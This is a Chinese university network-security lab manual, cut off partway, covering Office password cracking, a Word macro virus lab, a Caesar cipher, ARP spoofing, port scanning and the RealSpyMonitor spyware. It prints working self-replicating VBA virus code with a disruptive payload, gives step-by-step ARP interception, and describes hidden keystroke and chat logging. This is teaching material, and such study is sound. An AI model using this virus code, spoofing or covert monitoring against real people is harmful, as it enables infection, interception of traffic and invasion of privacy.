網(wǎng)絡與信息安全-實驗指導書(8次)_第1頁
網(wǎng)絡與信息安全-實驗指導書(8次)_第2頁
網(wǎng)絡與信息安全-實驗指導書(8次)_第3頁
網(wǎng)絡與信息安全-實驗指導書(8次)_第4頁
網(wǎng)絡與信息安全-實驗指導書(8次)_第5頁
已閱讀5頁,還剩14頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

網(wǎng)絡與信息安全實驗指導書

目錄實驗1.office口令破解工具aoxppr的使用實驗2.Word宏病毒實驗實驗3.用C語言編程實現(xiàn)古典替代密碼(凱撒密碼)實驗4.ARP地址欺騙實驗5.TCP與UDP端口掃描實驗6.RealSpyMonitor監(jiān)控網(wǎng)絡的使用實驗7.瑞星個人防火墻安裝使用實驗8.加密軟件pgp的使用實驗一office口令破解工具aoxppr的使用實驗目的:了解word口令破解的方法,掌握暴力破解和字典破解的原理,具體破解某個word文檔。實驗要求:某個同學設置word口令,長度分別為4,5,6,采用字母數(shù)字混合。實驗步驟:安裝aoxppr,點setup,一步步安裝完成;運行Aoxppr,點擊“幫助”,點擊“輸入注冊碼”,打開key.txt文件,輸入注冊碼,OK;破解類型選項,選暴力破解,字母數(shù)字混合,密碼長度最大選6;某人制作一個word文檔,對其進行加密;另一人對其進行解密,在Aoxppr中輸入待解密文件的文件名,點擊開始解密。如果該文檔沒有密碼,軟件馬上就會報告此文檔不用解密,4位密碼很快就可破譯,6位的密碼破解時間要長一點,運行過程中,隨時可以終止運行。系統(tǒng)破解后,會顯示出Office文檔的密碼。破解過程中可以使用掩碼,如密碼有8位,以x開始,以99結束,可以設置掩碼為"x?????99"用該密碼去解密OFFICE文檔。實驗二.Word宏病毒實驗實驗目的:演示宏的編寫;2、說明宏的原理及其安全漏洞和缺陷;3、理解宏病毒的作用機制實驗平臺:Windows系列操作系統(tǒng),Word2003應用程序實驗步驟:1.軟件設置:關閉殺毒軟件;打開Word2003,在工具宏安全性中,將安全級別設置為低,在可靠發(fā)行商選項卡中,選擇信任任何所有安裝的加載項和模板,選擇信任visualbasic項目的訪問。注意:為了保證該實驗不至于造成較大的破壞性,進行實驗感染后,被感染終端不要打開過多的word文檔,否則清除比較麻煩(對每個打開過的文檔都要清除)。2.自我復制功能演示。打開一個word文檔,然后按Alt+F11調用宏編寫窗口(工具宏VisualBasic宏編輯器),在左側的project—>MicrosoftWord對象ThisDocument中輸入以上代碼(參見源代碼macro_1.txt),保存,此時當前word文檔就含有宏病毒,只要下次打開這個word文檔,就會執(zhí)行以上代碼,并將自身復制到Normal.dot(word文檔的公共模板)和當前文檔的ThisDocument中,同時改變函數(shù)名(模板中為Document_Close,當前文檔為Document_Open),此時所有的word文檔打開和關閉時,都將運行以上的病毒代碼,可以加入適當?shù)膼阂獯a,影響word的正常使用,本例中只是簡單的跳出一個提示框。代碼如下:'Micro-VirusSubDocument_Open()OnErrorResumeNextApplication.DisplayStatusBar=FalseOptions.SaveNormalPrompt=FalseSetourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIfWithhostIf.Lines(1,1)<>"'Micro-Virus"Then.DeleteLines1,.CountOfLines.InsertLines1,ourcodemodule.Lines(1,100).ReplaceLine2,"SubDocument_Close()"IfThisDocument=NormalTemplateThen.ReplaceLine2,"SubDocument_Open()"ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWithMsgBox"MicroVirusbyContentSecurityLab"EndSub代碼解釋以上代碼的基本執(zhí)行流程如下:進行必要的自我保護Application.DisplayStatusBar=FalseOptions.SaveNormalPrompt=False高明的病毒編寫者其自我保護將做得非常好,可以使word的一些工具欄失效,例如將工具菜單中的宏選項屏蔽,也可以修改注冊表達到很好的隱藏效果。本例中只是屏蔽狀態(tài)欄,以免顯示宏的運行狀態(tài),并且修改公用模板時自動保存,不給用戶提示。得到當前文檔的代碼對象和公用模板的代碼對象Setourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIf檢查模板是否已經感染病毒,如果沒有,則復制宏病毒代碼到模板,并且修改函數(shù)名。WithHostIf.Lines(1.1)<>"'Micro-Virus"Then.DeleteLines1,.CountOfLines.InsertLines1,Ourcode .ReplaceLine2,"SubDocument_Close()"IfThisDocument=nomaltemplateThen .ReplaceLine2,"SubDocument_Open()"ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWith執(zhí)行惡意代碼MsgBox"MicroVirusbyContentSecurityLab"3.具有一定破壞性的宏我們可以對上例中的惡意代碼稍加修改,使其具有一定的破壞性(這里以著名宏病毒“臺灣一號”的惡意代碼部分為基礎,為使其在word2003版本中運行,且降低破壞性,對源代碼作適當修改,參見源代碼macro_2.txt)。完整代碼如下:'moonlightDimnm(4)SubDocument_Open()'DisableInput1Setourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIfWithhostIf.Lines(1,1)<>"'moonlight"Then.DeleteLines1,.CountOfLines.InsertLines1,ourcodemodule.Lines(1,100).ReplaceLine3,"SubDocument_Close()"IfThisDocument=NormalTemplateThen.ReplaceLine3,"SubDocument_Open()"ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWithCount=0IfDay(Now())=1Thentry:OnErrorGoTotrytest=-1con=1tog$=""i=0Whiletest=-1Fori=0To4nm(i)=Int(Rnd()*10)con=con*nm(i)Ifi=4Thentog$=tog$+Str$(nm(4))+"=?"GoTobegEndIftog$=tog$+Str$(nm(i))+"*"Nextibeg:Beepans$=InputBox$("今天是"+Date$+",跟你玩一個心算游戲"+Chr$(13)+"若你答錯,只好接受震撼教育......"+Chr$(13)+tog$,"臺灣NO.1MacroVirus")IfRTrim$(LTrim$(ans$))=LTrim$(Str$(con))ThenDocuments.AddSelection.Paragraphs.Alignment=wdAlignParagraphCenterBeepWithSelection.Font.Name="細明體".Size=16.Bold=1.Underline=1EndWithSelection.InsertAfterText:="何謂宏病毒"Selection.InsertParagraphAfterBeepSelection.InsertAfterText:="答案:"Selection.Font.Italic=1Selection.InsertAfterText:="我就是......"Selection.InsertParagraphAfterSelection.InsertParagraphAfterSelection.Font.Italic=0BeepSelection.InsertAfterText:="如何預防宏病毒"Selection.InsertParagraphAfterBeepSelection.InsertAfterText:="答案:"Selection.Font.Italic=1Selection.InsertAfterText:="不要看我......"GoTooutElseCount=Count+1Forj=1To20BeepDocuments.AddNextjSelection.Paragraphs.Alignment=wdAlignParagraphCenterSelection.InsertAfterText:="宏病毒"IfCount=2ThenGoTooutGoTotryEndIfWendEndIfout:EndSub 該病毒的效果如下:當打開被感染的word文檔時,首先進行自我復制,感染word模板,然后檢查日期,看是否是1日(即在每月的1日會發(fā)作),然后跳出一個對話框,要求用戶進行一次心算游戲,這里只用四個小于10的數(shù)相乘,如果作者的計算正確,那么就會新建一個文檔,跳出如下字幕:何謂宏病毒答案:我就是......如何預防宏病毒答案:不要看我......如果計算錯誤,新建20個寫有“宏病毒”字樣的word文檔,然后再一次進行心算游戲,總共進行3次,然后跳出程序。關閉文檔的時候也會執(zhí)行同樣的詢問。4.清除宏病毒對每一個受感染的word文檔進行如下操作: 打開受感染的word文檔,進入宏編輯環(huán)境(Alt+F11),打開NormalMicrosoftWord對象ThisDocument,清除其中的病毒代碼(只要刪除所有內容即可)。 然后打開ProjectMicrosoftWordThisDocument,清除其中的病毒代碼。 實際上,模板的病毒代碼只要在處理最后一個受感染文件時清除即可,然而清除模板病毒后,如果重新打開其他已感染文件,模板將再次被感染,因此為了保證病毒被清除,可以查看每一個受感染文檔的模板,如果存在病毒代碼,都進行一次清除。實驗三.用C語言編程實現(xiàn)古典替代密碼(凱撒密碼)一、實驗目的:通過編程實現(xiàn)替代密碼算法和置換密碼算法,加深對古典密碼體制的了解,為深入學習密碼學奠定基礎。二、實驗內容:實驗附帶的光盤里面有myCrySubstitude.cpp和myCrySubstitude.h文件,提供替代算法加解密數(shù)據(jù)串的接口。實驗附帶的光盤里面統(tǒng)一文件夾下面還有test.cpp文件,試在VC下編譯運行test.cpp文件,可以看到命令行界面的替代算法的測試程序。輸入數(shù)據(jù)串和密鑰,加密,然后解密。記錄下明文和密文。實驗四.ARP地址欺騙實驗目的:1.加深對ARP高速緩存的理解2.了解ARP協(xié)議的缺陷實驗環(huán)境:網(wǎng)絡協(xié)議仿真系統(tǒng)背景描述:流經主機A和主機C的數(shù)據(jù)包被主機D使用ARP欺騙進行截獲和轉發(fā)。流經主機E(接口)和主機F的數(shù)據(jù)包被主機B(接口)使用ARP欺騙進行截獲和轉發(fā)。實驗環(huán)境配置:本實驗采用網(wǎng)絡結構二。實驗原理:ARP表是IP地址和MAC地址的映射關系表,任何實現(xiàn)了IP協(xié)議棧的設備,一般情況下都通過該表維護IP地址和MAC地址的對應關系,這是為了避免ARP解析而造成的廣播數(shù)據(jù)報文對網(wǎng)絡造成沖擊。ARP表的建立一般情況下是通過二個途徑:

1、主動解析,如果一臺計算機想與另外一臺不知道MAC地址的計算機通信,則該計算機主動發(fā)ARP請求,通過ARP協(xié)議建立(前提是這兩臺計算機位于同一個IP子網(wǎng)上);

2、被動請求,如果一臺計算機接收到了一臺計算機的ARP請求,則首先在本地建立請求計算機的IP地址和MAC地址的對應表。因此,針對ARP表項,一個可能的攻擊就是誤導計算機建立正確的ARP表。根據(jù)ARP協(xié)議,如果一臺計算機接收到了一個ARP請求報文,在滿足下列兩個條件的情況下,該計算機會用ARP請求報文中的源IP地址和源MAC地址更新自己的ARP緩存:1、如果發(fā)起該ARP請求的IP地址在自己本地的ARP緩存中;2、請求的目標IP地址不是自己的。舉例說明過程:假設有三臺計算機A,B,C,其中B已經正確建立了A和C計算機的ARP表項。假設A是攻擊者,此時,A發(fā)出一個ARP請求報文,該ARP請求報文這樣構造:1、源IP地址是C的IP地址,源MAC地址是A的MAC地址;2、請求的目標IP地址是B的IP地址。這樣計算機B在收到這個ARP請求報文后(ARP請求是廣播報文,網(wǎng)絡上所有設備都能收到),發(fā)現(xiàn)C的ARP表項已經在自己的緩存中,但MAC地址與收到的請求的源MAC地址不符,于是根據(jù)ARP協(xié)議,使用ARP請求的源MAC地址(即A的MAC地址)更新自己的ARP表。這樣B的ARP緩存中就存在這樣的錯誤ARP表項:C的IP地址跟A的MAC地址對應。這樣的結果是,B發(fā)給C的數(shù)據(jù)都被計算機A接收到。實驗步驟:按照拓撲結構圖連接網(wǎng)絡,使用拓撲驗證檢查連接的正確性。

本練習將主機A、C和D作為一組,主機B、E、F作為一組?,F(xiàn)僅以主機A、C和D為例說明試驗步驟。(由于兩組使用的設備不同,采集到的數(shù)據(jù)包不完全相同)主機A和主機C使用“arp-a”命令察看并記錄ARP高速緩存。主機A、C啟動協(xié)議分析器開始捕獲數(shù)據(jù)并設置過濾條件(提取ARP協(xié)議和ICMP協(xié)議)。主機Aping主機C。觀察主機A、C上是捕獲到的ICMP報文,記錄MAC地址。主機D啟動仿真編輯器向主機A編輯ARP請求報文(暫時不發(fā)送)。其中:

MAC層:“源MAC地址”設置為主機D的MAC地址

“目的MAC地址”設置為主機A的MAC地址

ARP層:“源MAC地址”設置為主機D的MAC地址

“源IP地址”設置為主機C的IP地址

“目的MAC地址”設置為000000-000000。

“目的IP地址”設置為主機A的IP地址主機D向主機C編輯ARP請求報文(暫時不發(fā)送)。其中:

MAC層:“源MAC地址”設置為主機D的MAC地址

“目的MAC地址”設置為主機C的MAC地址

ARP層:“源MAC地址”設置為主機D的MAC地址

“源IP地址”設置為主機A的IP地址

“目的MAC地址”設置為000000-000000。

“目的IP地址”設置為主機C的IP地址同時發(fā)送第4步和第5步所編輯的數(shù)據(jù)包。

注意:為防止主機A和主機C的ARP高速緩存表被其它未知報文更新,可以定時發(fā)送數(shù)據(jù)包(例如:每隔500ms發(fā)送一次)。觀察并記錄主機A和主機C的ARP高速緩存表。在主機D上啟動靜態(tài)路由服務(方法:在命令行方式下,輸入“staticroute_config”),目的是實現(xiàn)數(shù)據(jù)轉發(fā)。主機D禁用ICMP協(xié)議。在命令行下輸入“mmc”,啟動微軟管理控制臺。導入控制臺文件。單擊“文件(F)\打開(O)...”菜單項來打開“c:\WINNT\system32\IPSecPolicy\stopicmp.msc”。導入策略文件。單擊“操作(A)\所有任務(K)\導入策略(I)...”菜單項來打開“c:\WINNT\system32\IPSecPolicy\stopicmp.ipsec”。此命令執(zhí)行成功后,在策略名稱列表中會出現(xiàn)“禁用ICMP”項。啟動策略。用鼠標選中“禁用ICMP”項,單擊右鍵,選擇“指派(A)”菜單項。主機A上ping主機C(“ping主機C的IP地址–n1”)。-n:發(fā)送count指定的ECHO數(shù)據(jù)包數(shù)。通過這個命令可以自己定義發(fā)送的個數(shù),對衡量網(wǎng)絡速度很有幫助。能夠測試發(fā)送數(shù)據(jù)包的返回平均時間及時間的快慢程度。默認值為4。主機A、C停止捕獲數(shù)據(jù),分析捕獲到的數(shù)據(jù),并回答以下問題:主機A、C捕獲到的ICMP數(shù)據(jù)包的源MAC地址和目的MAC地址是什么?結合主機A和主機C捕獲到的數(shù)據(jù)包,繪制出第6步發(fā)送的ICMP數(shù)據(jù)包在網(wǎng)絡中的傳輸路徑圖。主機D取消對ICMP的禁用。在微軟管理控制臺(mmc)上,用鼠標選中“禁用ICMP”項,單擊右鍵,選擇“不指派(U)”菜單項。實驗五.TCP與UDP端口掃描實驗目的了解常用的TCP、UDP端口掃描的原理及其各種手段

實驗環(huán)境:網(wǎng)絡協(xié)議仿真系統(tǒng)實驗原理一、TCP/UDP報文頭格式

UDP報文格式見實驗六(用戶數(shù)據(jù)報協(xié)議UDP);TCP報文格式見實驗七(傳輸控制協(xié)議TCP)實驗原理。在TCP首部中6個標志位的用法依次為:

URG緊急指針(urgentpointer)有效。

ACK確認序號有效。

PSH接收方應該盡快將這個報文段交給應用層。

RST重建連接。

SYN同步序號用來發(fā)起一個連接。

FIN發(fā)端完成發(fā)送任務

二、ICMP端口不可達報文

ICMP端口不可達報文格式見Internet控制報文協(xié)議ICMP實驗原理。類型域為3,代碼域為3表示該ICMP報文為端口不可達報文,它是ICMP目的不可達報文的一種。三、TCPconnect()掃描

這種方法最簡單,直接連到目標端口并完成一個完整的三次握手過程(SYN,SYN/ACK,和ACK)。操作系統(tǒng)提供的“connect()”函數(shù)完成系統(tǒng)調用,用來與每一個感興趣的目標計算機的端口進行連接。如果端口處于偵聽狀態(tài),那么“connect()”函數(shù)就能成功。否則,這個端口是不能用的,即沒有提供服務。這個技術的一個最大的優(yōu)點是不需要任何權限,系統(tǒng)中的任何用戶都有權利使用這個調用。另一個好處是速度。如果對每個目標端口以線性的方式,使用單獨的“connect()”函數(shù)調用,那么將會花費相當長的時間,你可以通過同時打開多個套接字,從而加速掃描。使用非阻塞I/O允許你設置一個低的時間用盡周期,同時觀察多個套接字。但這種方法的缺點是很容易被發(fā)覺,并且很容易被過濾掉。目標計算機的日志文件會顯示一連串的連接和連接出錯的服務消息,目標計算機用戶發(fā)現(xiàn)后就能很快使它關閉。

四、TCPSYN掃描

這種技術也叫“半開放式掃描”(half-openscanning),因為它沒有完成一個完整的TCP協(xié)議連接。這種方法向目標端口發(fā)送一個SYN分組(packet),如果目標端口返回SYN/ACK標志,那么可以肯定該端口處于檢聽狀態(tài);否則,返回的是RST/ACK標志。這種方法比第一種更具隱蔽性,可能不會在目標系統(tǒng)中留下掃描痕跡。但這種方法的一個缺點是,必須要有root權限才能建立自己的SYN數(shù)據(jù)包。

五、TCPFIN掃描

這種方法向目標端口發(fā)送一個FIN分組。按RFC793的規(guī)定,對于所有關閉的端口,目標系統(tǒng)應該返回一個RST(復位)標志。這種方法通常用在基于UNIX的TCP/IP協(xié)議堆棧,有的時候有可能SYN掃描都不夠秘密。一些防火墻和包過濾器會對一些指定的端口進行監(jiān)視,有的程序能檢測到這些掃描。相反,F(xiàn)IN數(shù)據(jù)包可能會沒有任何麻煩的通過。這種掃描方法的思想是關閉的端口會用適當?shù)腞ST來回復FIN數(shù)據(jù)包。另一方面,打開的端口會忽略對FIN數(shù)據(jù)包的回復。這種方法和系統(tǒng)的實現(xiàn)有一定的關系,有的系統(tǒng)不管端口是否打開,都回復RST,這樣,這種掃描方法就不適用了。并且這種方法在區(qū)分Unix和NT時,是十分有用的。

六、UDP端口掃描

這種方法向目標端口發(fā)送一個UDP協(xié)議分組。如果目標端口以“ICMPportunreachable”消息響應,那么說明該端口是關閉的;反之,如果沒有收到“ICMPportunreachable”響應消息,則可以肯定該端口是打開的。由于UDP協(xié)議是面向無連接的協(xié)議,這種掃描技術的精確性高度依賴于網(wǎng)絡性能和系統(tǒng)資源。另外,如果目標系統(tǒng)采用了大量分組過濾技術,那么UDP協(xié)議掃描過程會變得非常慢。如果你想對Internet進行UDP協(xié)議掃描,那么你不能指望得到可靠的結果。實驗環(huán)境配置該實驗采用網(wǎng)絡結構一。實驗步驟:按照拓撲結構圖連接網(wǎng)絡,使用拓撲驗證檢查連接的正確性。本練習將主機A和B作為一組,主機C和D作為一組,主機E和F作為一組?,F(xiàn)僅以主機A和B為例,說明實驗步驟。一:TCPConnect掃描1.在主機B上啟動協(xié)議分析器進行數(shù)據(jù)捕獲,并設置過濾條件(提取TCP協(xié)議)。

2.在主機A上使用TCP連接工具,掃描主機B的某一端口:

a.主機A上填入主機B的IP、主機B的某一開放端口號,點擊“連接”按鈕進行連接。

b.觀察提示信息,是否連接上。

c.主機A點擊“斷開”按鈕斷開連接。

d.主機A使用主機B的某一未開放的端口重復以上試驗步驟。

3.察看主機B捕獲的數(shù)據(jù),分析連接成功與失敗的數(shù)據(jù)包差別。

結合捕獲數(shù)據(jù)的差別,說明TCPConnet掃描的實現(xiàn)原理。二:TCPSYN掃描1.在主機A上使用端口掃描來獲取主機B的TCP活動端口列表(掃描端口范圍設置為0~65535)。

2.在主機B上啟動協(xié)議分析器進行數(shù)據(jù)捕獲,并設置過濾條件(提取TCP協(xié)議)。

3.主機A編輯TCP數(shù)據(jù)包:

MAC層:

目的MAC地址:B的MAC地址。

源MAC地址:A的MAC地址。

IP層:

源IP地址:A的IP地址。

目的IP地址:B的IP地址。

TCP層:

源端口:A的未用端口(大于1024)。

目的端口:B的開放的端口(建議不要選擇常用端口)。

標志SYN置為1,其他標志置為0。

4.發(fā)送主機A編輯好的數(shù)據(jù)包。

5.修改主機A編輯的數(shù)據(jù)包(將目的端口置為主機B上未開放的TCP端口),將其發(fā)送。

6.察看主機B捕獲的數(shù)據(jù),找到主機A發(fā)送的兩個數(shù)據(jù)包對應的應答包。

分析兩個應答包的不同之處,說明TCPSYN掃描的實現(xiàn)原理。三:UDP端口掃描1.在主機B上使用命令“netstat-a”,顯示本機可用的TCP、UDP端口。注意:通過此命令,會得到一個UDP開放端口列表,同學可以在UDP開放端口列表中任選一個來完成此練習。下面以microsoft-ds(445)端口為例,說明練習步驟。

2.在主機B上啟動協(xié)議分析器進行數(shù)據(jù)捕獲并設置過濾條件(提取主機A的IP和主機B的IP)。

3.主機A編輯UDP數(shù)據(jù)包:

MAC層:

目的MAC地址:B的MAC地址。

源MAC地址:A的MAC地址。

IP層:

源IP地址:A的IP地址。

目的IP地址:B的IP地址。

UDP層:

源端口:A的可用端口。

目的端口:B開放的UDP端口445。

4.發(fā)送主機A編輯好的數(shù)據(jù)包。

5.修改主機A編輯的數(shù)據(jù)包(將目的端口置為主機B上未開放的UDP端口),將其發(fā)送。

6.察看主機B捕獲的數(shù)據(jù)。

主機A發(fā)送的數(shù)據(jù)包,哪個收到目的端口不可達的ICMP數(shù)據(jù)報。

說明這種端口掃描的原理。

使用這種端口掃描得到的結果準確嗎?說明理由。實驗六.RealSpyMonitor監(jiān)控網(wǎng)絡的使用實驗目的:1。利用RealSpyMonitor記錄電腦上所有的操作;2。利用RealSpyMonitor查看所作的紀錄。實驗要求:1人1組,獨立完成實驗步驟:首先進行安裝,按步驟一步步進行;第一次運行設置密碼;RealSpyMonitor主界面共分為四列,分別是“Option”,“PCActivity”,“Internet”以及“Buttons”。RealSpyMonitor的Configuration界面有七個頁面,我們先來看看“GeneralSetting”頁面。在該頁面中,我們可以設定RealSpyMonitor是否在開機的時候自動啟動,自動啟動是否僅僅在當前用戶生效,以及啟動的時候是否隱藏界面,是否在桌面設置RealSpyMonitor的快捷方式,是否在啟動的時候彈出警告等。一般來說,如果我們希望更有效地發(fā)揮RealSpyMonitor的監(jiān)控功能,我們只需要勾上“LoadmeonWindowsStartupforallUsers”選項,其它則保留默認設置就可以了。下面我們進入“LoggingRecord”頁面,在這個頁面中,我們可以選擇在RealSpyMonitor啟動后所需要記錄的事件:鍵盤的敲擊;窗口的標題;瀏覽的Web頁面;執(zhí)行的程序;訪問的文件;MSN,ICQ,AIM,YahooMessenger等聊天工具的聊天記錄;MSN/Hotmail和Yahoo郵箱的信件內容。我們還可以選擇記錄文件的路徑以及

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論